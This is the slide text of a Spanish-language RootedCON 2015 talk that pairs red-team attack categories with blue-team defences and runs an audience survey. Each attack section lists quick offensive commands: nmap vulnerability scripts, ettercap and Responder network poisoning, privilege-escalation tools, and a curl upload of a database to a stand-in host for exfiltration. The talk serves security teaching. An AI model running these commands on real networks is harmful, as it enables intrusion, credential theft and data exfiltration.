rooted con 2015 - rojos y azules: dos equipos con dos sabores

Rojos/Azules: dos equipos con dos sabores

Alejadro Ramos - 2015

Introducción.

•Modo colaborativo.

• Se introducirá un tema y hacemos encuesta vía web.

•Al acabar vemos las respuestas y opinamos sobre ellas.

• Se espera vuestra participación (!!)

•Para que tenga sentido, vamos haciendo el test todos a la vez.

URL: http://secby.me/redblueteam

• Fecha de creación: lunes, 02 de marzo de 2015

274• Respuestas totales

• Respuestas completas: 182

Metodología: Assume Breach (Microsoft)

Metodología que da por perdida la primera parte de la batalla, consiste en detectar gaps en las siguientes tácticas, técnicas y procedimientos (TTP):

• Detección de ataques y penetraciones.• Respuesta a los ataques y penetraciones.• Recuperación de la fuga, modificación o compromiso de

información.• Prevención de futuros ataques y penetración.

¿Qué es para ti un Red Team?

Q1: ¿Qué es para ti un red team?

• Respondido: 273 Omitido: 1

¿Seguridad ofensiva?

Q2: ¿Seguridad ofensiva?


Red Team.The Red Team is a group of full-time staff within <company> that focuses on breaching client infrastructure, platform and client own tenants and applications. They are the dedicated

adversary (a group of ethical hackers) performing targeted and persistent attacks.

- Microsoft

Objetivo medible mediante:• Tiempo medio para comprometer - Mean Time to Compromise

(MTTC)

• Tiempo medio para escalar privilegios o pwnage - Mean Time to Privilege Escalation or “Pwnage” (MTTP)

¿Qué es para ti un Blue Team?

Q3: ¿Qué es para ti un blue team?


¿Seguridad defensiva?

Q4: ¿Seguridad defensiva?


Blue Team.The Blue Team is comprised of either a dedicated set of

security responders or members from across the securityincident response, Engineering and Operations organizations.

-Microsoft

Objetivo medible mediante:• Tiempo medio de detección - Mean-Time to Detect (MTTD)

• Tiempo medio de recuperación - Mean-Time to Recovery (MTTR)

Predecir Prevenir Detectar Responder

¿SQLMap o mod_security?

Q5: ¿SQLMap o de mod_security?


Así están las cosas para los azules.

MTTC/MTTP Top 6 ataques MTTD/MTTR Top 6 defensas

Desde una perspectiva de ejercicio con escenario interno.

Red Top 1/6: Credenciales.• WTF. Lo mismo de siempre, 30 años después.

• Por eso sigue en el Top.

• Ejemplos:• Contraseñas en el Group Policy Preferences.• Contraseñas en los comentarios de un usuario del

directorio activo.• SQL Server sa/<blank> Oracle: SYSTEM/MANAGER• Marzo2015 o similares como contraseña en AD.• Y eso, si no hay un xls con todas las passwords en

una carpeta pública en un file server…

5 mins pwnage:• nmap -p 1433 --script ms-sql-empty-password

Blue Top 1/6: Credenciales.

Soluciones complejas (… por eso sigue en el top …)

• Robustecer “Passfilt.dll” de Windows con aplicación de terceros.

• Sistemas de salto “jumpbox” monitorizados.

• Soluciones de doble factor de autenticación.

• Aplicar acceso 4eyes a contraseñas sensibles / OTP

• “Honeyusers” con usuarios que únicamente ejecutan alertas.

• Monitorización exhaustiva de logins fallidos.

• Gestión de Identidades.

• Políticas de contraseñas, Captchas, bloqueos, etc…

¿Solución a las contraseñas?

Q6: ¿Solución a las contraseñas?


Red Top 2/6: Vulnerabilidades en aplicaciones.• Exploits conocidos o por conocer.

• Ejemplos:• shellshock, heartbleed, jetleak…• Los XP que quedan por ahí muertos.• Java/Flash.• Software de backup.• Webs con RCE/LFI, etc.

5 mins pwnage:• nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 …• nmap -p 443 --script ssl-heartbleed …• Metasploit …• ./exploit-db.py

Blue Top 2/6: Vulnerabilidades en aplicaciones.

• Arquitectura de red: segmentación de red, reglas en firewall internos.

• Uso de IPS.

• Despliegue automático de parches:• Windows: SCCM/WSUS .

• Linux: Satellite/Spacewalk/Landscape

• chef/puppet/salt, etc

• EMET - Enhanced Mitigation Experience Toolkit.

• Grsecurity.

• Controles en navegación. Ej: alertas con User-Agents específicos de Java.

• Vulnerability Scans y Revisiones de cumplimiento.

¿Método DELETE, PUT en un servidor web?

Q7: Te encuentras el método DELETE y PUT habilitado en un servidor web.• Respondido: 246 Omitido: 28

Red Top 3/6: Ataques de red.

• Ataques Man In The Middle en sus 300 formas.

• Ejemplos:• ARP Spoofing.

• WPAD Poisoning, LLMNR Poisoning.

• DHCP Spoofing.

• Rogue/Fake AP

5 mins pwnage:• ettercap -T -q -i eth0 -M arp:remote /192.168.1.69/

/192.168.1.1/

• Responder -i 192.168.1.100 -wrf

• ettercap -Tq -M dhcp:/255.255.255.0/192.168.1.1Imagen de: http://www.sternsecurity.com/

Blue Top 3/6: Ataques de red.

• Aplicación de Network Access Control.

• Configuración de Dynamic ARP Inspection.

• Habilitar DHCP Snooping.

• El uso de protocolos cifrados.

• Desactivar IPv6.

• Desactivar Multicast Name Resolution.

• Evitar el uso de WPAD

• Implantar Wireless intrusion detection system

• Segmentación de red.

• Firewall / IPS

¿Están superados los ataques de red?

Q8: ¿Están superados los ataques de red internos?• Respondido: 244 Omitido: 30

Red Top 4/6: Privilegios

• De usuario guarrete a local admin, de local admin a domain admin y de ahí al infinito.

• Ejemplos:• Servicios con permisos incorrectos.• Binarios en local o servidores de ficheros con

permisos incorrectos.• Uso de usuarios de aplicación privilegiados.• Usuarios del dominio con privilegios de Local

Admin.• sudo demasiado permisivo.

5 mins pwnage:• PowerUp.ps1: Invoke-AllChecks• Sticky keys• Kon-Boot

Blue Top 4/6: Privilegios.

• Eliminar acceso al cmd y powershell.

• Meter en el registro una entrada no aceptando el EULA de sysinternals (y proteger sus permisos).

• Activar UAC/Firewall de Windows.

• Permisos en las tareas programadas.

• Uso de listas blancas de binarios, comprobación de firmas, AppLocker, etc.

• Eliminar acceso a USB/CD (bios)

• Cifrar contenido del disco duro, bitlocker y similares.

En tu empresa, ¿Tienes administrador local de tu PC?

Q9: En tu empresa, ¿Tienes administrador local de tu PC?• Respondido: 242 Omitido: 32

Red Top 5/6: In/Exfiltración

• Introducir o exportar información de la red. Documentos, herramientas o cualquier otro tipo de fichero.

• Ejemplos:• Mediante HTTP por el proxy.

• Correos electrónicos.

• Túneles DNS.

• IM

5 mins pwnage:• curl --data-binary @mi_bbdd.zip http://muaha.net/upload.php

Blue Top 5/6: In/Exfiltración.

• Inspección de SSL en navegación.• Bloqueo de categorías tipo hacking, malware, etc.• Bloquear la descarga de ejecutables y derivados.• En caso de dominios no conocidos, página de bienvenida.• Bloqueo de dominios jóvenes, Ej <20 días.• Limitar peticiones POST, Ej cabeceras mayores de 50kb.• No resolver DNS de Internet desde las workstation.• Firmas específicas en IPS para túneles y otros covert channels.• Bloqueo o cifrado de USB.• Antivirus.

¿Tu método favorito para mandar documentación confidencial a casa?

Q10: ¿Cuál es tu método favorito para mandar documentación confidencial a casa?• Respondido: 241 Omitido: 33

¿Cuál tu top red 6?

¿Cuál es tu top blue 6?

Gracias.Alejandro Ramos – Marzo 2015

www.securitybydefault.com / @aramosf

http://secby.me/redbluerespuestas

http://www.securitybydefault.com/

rooted con 2015 - rojos y azules: dos equipos con dos sabores

Technology